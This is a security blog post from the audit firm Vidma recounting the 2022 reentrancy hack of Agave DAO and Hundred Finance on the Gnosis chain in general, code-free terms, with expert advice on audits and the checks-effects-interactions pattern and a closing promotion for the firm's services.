The Agave and Hundred Finance Hack: A $11.7M Reentrancy Exploit

May 21, 2023
15 min read

The Agave and Hundred Finance Hack: A $11.7M Reentrancy Exploit

The Dual Protocol Attack: A Blockchain Security Nightmare

On March 15, 2022, the cryptocurrency world witnessed a significant breach when two DeFi protocols, Agave DAO and Hundred Finance, fell victim to a sophisticated reentrancy attack. This incident not only highlighted the vulnerabilities inherent in smart contracts but also emphasized the critical need for robust blockchain security measures and comprehensive smart contract audits.

Unraveling the $11.7M Heist

The attack on Agave DAO and Hundred Finance resulted in a staggering loss of $11.7 million, with Agave losing 2116 ETH ($5.5M) and Hundred Finance losing 2363 ETH ($6.2M). This hack marked a significant milestone as it was the first of its kind on the Gnosis (xDai) chain and the first instance where two protocols were directly targeted simultaneously.

The Anatomy of the Attack

Exploiting the xDAI Token Design

The vulnerability that the attacker exploited stemmed from the design of the xDAI token, specifically a function called _callAfterTransfer(). This function inadvertently created a reentrancy vulnerability, allowing the attacker to manipulate the protocols' lending mechanisms.

The Flash Loan Maneuver

The attacker's strategy involved using flash loans as initial collateral. By stacking additional loan functions, they were able to exploit the protocol before it could update the debt balance. This clever manipulation allowed the attacker to borrow assets far exceeding the value of their collateral.

A Familiar Attack Vector

Interestingly, this attack bore striking similarities to a previous $18.8M hack on CREAM Finance in August 2021. This recurrence highlights the persistent nature of certain vulnerabilities in the DeFi space and the importance of learning from past incidents.

Vulnerabilities in the DeFi Ecosystem

The Perils of Code Replication

One of the key issues highlighted by this incident is the inherent risk in the structure of many DeFi projects. The practice of forking existing protocols and reusing code can lead to the propagation of vulnerabilities across multiple projects.

Unexpected Vulnerabilities in New Environments

Even when projects fork strong, well-audited code, transitioning to new environments like xDai can introduce unexpected vulnerabilities. This hack demonstrated that security measures that work in one blockchain environment might not be sufficient in another.

Expert Insights and Post-Mortem Analysis

The Need for Comprehensive Security Reviews

Daniel Von Fange, a respected voice in the blockchain security community, emphasized the importance of thorough security audits. He stated, "When one fork falls, all other forks need to re-evaluate their entire infrastructure." This underscores the interconnected nature of DeFi protocols and the ripple effect that vulnerabilities can have across the ecosystem.

Addressing Reentrancy Vulnerabilities

Mudit Gupta, another blockchain security expert, highlighted a crucial strategy for mitigating such attacks. He advocated for following the "checks-effects-interactions pattern" in smart contract development. This approach involves performing all necessary checks and updates to the contract's state before making any external calls, thereby reducing the risk of reentrancy attacks.

Lessons Learned and Prevention Strategies

Rigorous Auditing and Unique Threat Assessments

The Agave and Hundred Finance hack serves as a stark reminder of the importance of rigorous auditing, especially when forking existing protocols. Projects must conduct unique threat assessments that consider the specific environment in which they operate.

Implementing Strict Controls

Both Agave DAO and Hundred Finance, despite being forks of reputable protocols like Aave and Compound, lacked the strict controls necessary to prevent tokens with reentrancy vulnerabilities from being used as collateral. This oversight highlights the need for meticulous security measures, even when building upon established foundations.

Continuous Security Evolution

The recurring nature of similar attacks in the DeFi space emphasizes the need for continuous security evolution. As new vulnerabilities are discovered, it's crucial for all projects to review and update their security measures promptly.

The Broader Implications for Blockchain Security

Rising Threats in Cross-Chain Environments

The Agave and Hundred Finance hack, occurring on the Gnosis (xDai) chain, highlights the growing risks in cross-chain environments. As blockchain ecosystems become more interconnected, the potential attack surface expands, necessitating more sophisticated security measures.

The Role of Smart Contract Audits

This incident underscores the critical importance of comprehensive smart contract audits. Regular and thorough audits can help identify potential vulnerabilities before they can be exploited, potentially saving millions in losses.

Balancing Innovation and Security

The DeFi space continues to be a hotbed of innovation, but as this hack demonstrates, innovation must be balanced with robust security practices. Projects must prioritize security without stifling the rapid development that characterizes the blockchain industry.

Conclusion: A Wake-Up Call for the DeFi Community

The Agave and Hundred Finance hack serves as a sobering reminder of the vulnerabilities that persist in the DeFi ecosystem. It highlights the need for constant vigilance, comprehensive security measures, and a community-wide commitment to learning from past incidents.

As the blockchain industry continues to evolve, so too must our approach to security. By prioritizing thorough audits, implementing best practices in smart contract development, and fostering a culture of security-first innovation, we can work towards a more resilient and trustworthy DeFi ecosystem.

The lessons learned from this $11.7 million heist are invaluable. They remind us that in the world of blockchain and cryptocurrency, security is not a one-time achievement but an ongoing process of improvement and adaptation.

At Vidma, we understand the critical importance of robust security measures in the blockchain space. Our team of expert smart contract auditors specializes in identifying and mitigating vulnerabilities like those exploited in the Agave and Hundred Finance hack. Visit https://www.vidma.io to learn how we can fortify your blockchain endeavors.

Lorem ipsum dolor sit amet

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vel sapien turpis scelerisque est. Netus gravida urna, amet, interdum egestas nunc, interdum. Pellentesque blandit lobortis massa nulla id est. Facilisi cras nibh donec vitae. Congue fermentum, viverra tortor placerat. Pharetra id quisque massa diam vulputate in nullam orci at. Cursus mus senectus natoque urna, augue ligula nam felis. Sem facilisis cursus volutpat purus odio nulla facilisis. Fermentum cursus purus vitae posuere luctus vitae congue.
This is some text inside of a div block.
This is some text inside of a div block.
This is some text inside of a div block.
This is some text inside of a div block.
Link text

Lorem ipsum dolor sit amet

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vel sapien turpis scelerisque est. Netus gravida urna, amet, interdum egestas nunc, interdum. Pellentesque blandit lobortis massa nulla id est. Facilisi cras nibh donec vitae. Congue fermentum, viverra tortor placerat. Pharetra id quisque massa diam vulputate in nullam orci at. Cursus mus senectus natoque urna, augue ligula nam felis. Sem facilisis cursus volutpat purus odio nulla facilisis. Fermentum cursus purus vitae posuere luctus vitae congue.
Tags:
#Security-Review #Audit #Hacks